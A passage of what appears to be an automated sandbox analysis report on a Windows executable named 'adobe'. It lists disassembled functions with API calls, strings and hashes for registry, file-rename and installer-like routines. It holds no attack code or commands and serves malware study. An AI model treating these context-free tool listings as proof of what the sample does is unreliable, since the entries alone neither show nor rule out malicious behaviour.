                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                          • String ID: 2$MAINICON
                                                                                                                                                          • API String ID: 3935243913-3181700818
                                                                                                                                                          • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                                                                                          • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                                                                                                          • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                                                                                          • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                                                                                            • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                            • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                            • Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                            • Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                            • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                                                                            • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                                                                            • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                                                                            • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                                                                            • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                                                                            • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                                                                            • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                                                                            • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                                          • API String ID: 3864787166-2767913252
                                                                                                                                                          • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                                                                                          • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                                                                                                          • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                                                                                          • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$Prop
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3887896539-0
                                                                                                                                                          • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                                                                                          • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                                                                                                          • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                                                                                          • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454C04 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D9B,?,00000000,00454DDB), ref: 00454CE1
                                                                                                                                                          Strings
                                                                                                                                                          • PendingFileRenameOperations2, xrefs: 00454CB0
                                                                                                                                                          • WININIT.INI, xrefs: 00454D10
                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C64
                                                                                                                                                          • PendingFileRenameOperations, xrefs: 00454C80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                                          • API String ID: 47109696-2199428270
                                                                                                                                                          • Opcode ID: 58b4bd1b0b787c5f2ac193920b061fab1f2066d87e26b8992d7b5e22dbc5c793
                                                                                                                                                          • Instruction ID: f0141262be7a00e61dcd825f0f006365f3ff03c75eb903519351dbfe0bd0c0d1
                                                                                                                                                          • Opcode Fuzzy Hash: 58b4bd1b0b787c5f2ac193920b061fab1f2066d87e26b8992d7b5e22dbc5c793
                                                                                                                                                          • Instruction Fuzzy Hash: 13519B70E002089FDB11EF61DC519DEB7B9EB84309F50857BE804EB282D778AE49CA18
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                          • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                          • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$EnumLongWindows
                                                                                                                                                          • String ID: lAB
                                                                                                                                                          • API String ID: 4191631535-3476862382
                                                                                                                                                          • Opcode ID: ac83dcd26946572d973140af976460ec6b841e514006ae286109fe1e17b4d41b
                                                                                                                                                          • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                                                                                                          • Opcode Fuzzy Hash: ac83dcd26946572d973140af976460ec6b841e514006ae286109fe1e17b4d41b
                                                                                                                                                          • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                          • String ID: t<t
                                                                                                                                                          • API String ID: 730355536-2283984196
                                                                                                                                                          • Opcode ID: 5e2eb2496afd3fc4c16b730b74e1b05e66d96082c0f1b154e12a188d47f45e1b
                                                                                                                                                          • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                                                                                                          • Opcode Fuzzy Hash: 5e2eb2496afd3fc4c16b730b74e1b05e66d96082c0f1b154e12a188d47f45e1b
                                                                                                                                                          • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DD6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495ECB), ref: 0042DD93
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                                                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                                                          • API String ID: 588496660-1846899949
                                                                                                                                                          • Opcode ID: a1b10dafa016cc2537d85744fe8f18faa0a04b53368911ce0fd196557ecab751
                                                                                                                                                          • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                                                                                                          • Opcode Fuzzy Hash: a1b10dafa016cc2537d85744fe8f18faa0a04b53368911ce0fd196557ecab751
                                                                                                                                                          • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00481650 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetActiveWindow.USER32(?,?,00000000,00481965,?,?,00000001,?), ref: 00481761
                                                                                                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004817D6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ActiveChangeNotifyWindow
                                                                                                                                                          • String ID: $Need to restart Windows? %s
                                                                                                                                                          • API String ID: 1160245247-4200181552
                                                                                                                                                          • Opcode ID: 90a9701301ea6d6e270970a3c1a491c7c2ea0bab8356092fbe10affc47922363
                                                                                                                                                          • Instruction ID: 258ae82630cccce1ed416badf84f61652156c92a9ac7b4db40c87d24fe756750
                                                                                                                                                          • Opcode Fuzzy Hash: 90a9701301ea6d6e270970a3c1a491c7c2ea0bab8356092fbe10affc47922363
                                                                                                                                                          • Instruction Fuzzy Hash: 4C9192746002449FCB10FB69E986B9E77E5EF45308F1444BBE8109B372DB78A906CB5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046EC24 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                                                                          • GetLastError.KERNEL32(00000000,0046EE21,?,?,0049B178,00000000), ref: 0046ECFE
                                                                                                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046ED78
                                                                                                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046ED9D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                          • String ID: Creating directory: %s
                                                                                                                                                          • API String ID: 2451617938-483064649
                                                                                                                                                          • Opcode ID: f2326d96bf580de45446b3a88e0ed9ef350abc6dd031fbc90e7b757120d0fa20
                                                                                                                                                          • Instruction ID: e286108a59dfd36e0898e5c3768873ff56d0638af642643f1fdc10795f0860a6
                                                                                                                                                          • Opcode Fuzzy Hash: f2326d96bf580de45446b3a88e0ed9ef350abc6dd031fbc90e7b757120d0fa20
                                                                                                                                                          • Instruction Fuzzy Hash: D0512274E00258ABDB01DFA6C582BDEB7F5AF49304F5085AAF800B7382D7795E04CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004543AE
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454474), ref: 00454418
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressByteCharMultiProcWide
                                                                                                                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                          • API String ID: 2508298434-591603554
                                                                                                                                                          • Opcode ID: 17c6a901ef2fc40f22a20c8d9f0c5c0f97a481f64c1e45672719aa537b03b759
                                                                                                                                                          • Instruction ID: 02c15e4a31af94c42cf1f3a5d465fde73ea199283f03605d329b87cd975f2ee4
                                                                                                                                                          • Opcode Fuzzy Hash: 17c6a901ef2fc40f22a20c8d9f0c5c0f97a481f64c1e45672719aa537b03b759
                                                                                                                                                          • Instruction Fuzzy Hash: B741A770A003189BEB10DB55DC85B9E77B8AB45309F5081B7E808A7293D7785F89CE5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                          • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Class$InfoRegisterUnregister
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 3749476976-2766056989
                                                                                                                                                          • Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                                                                                          • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                                                                                                          • Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                                                                                          • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00453094 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453183,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530DA
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453183,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530E3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
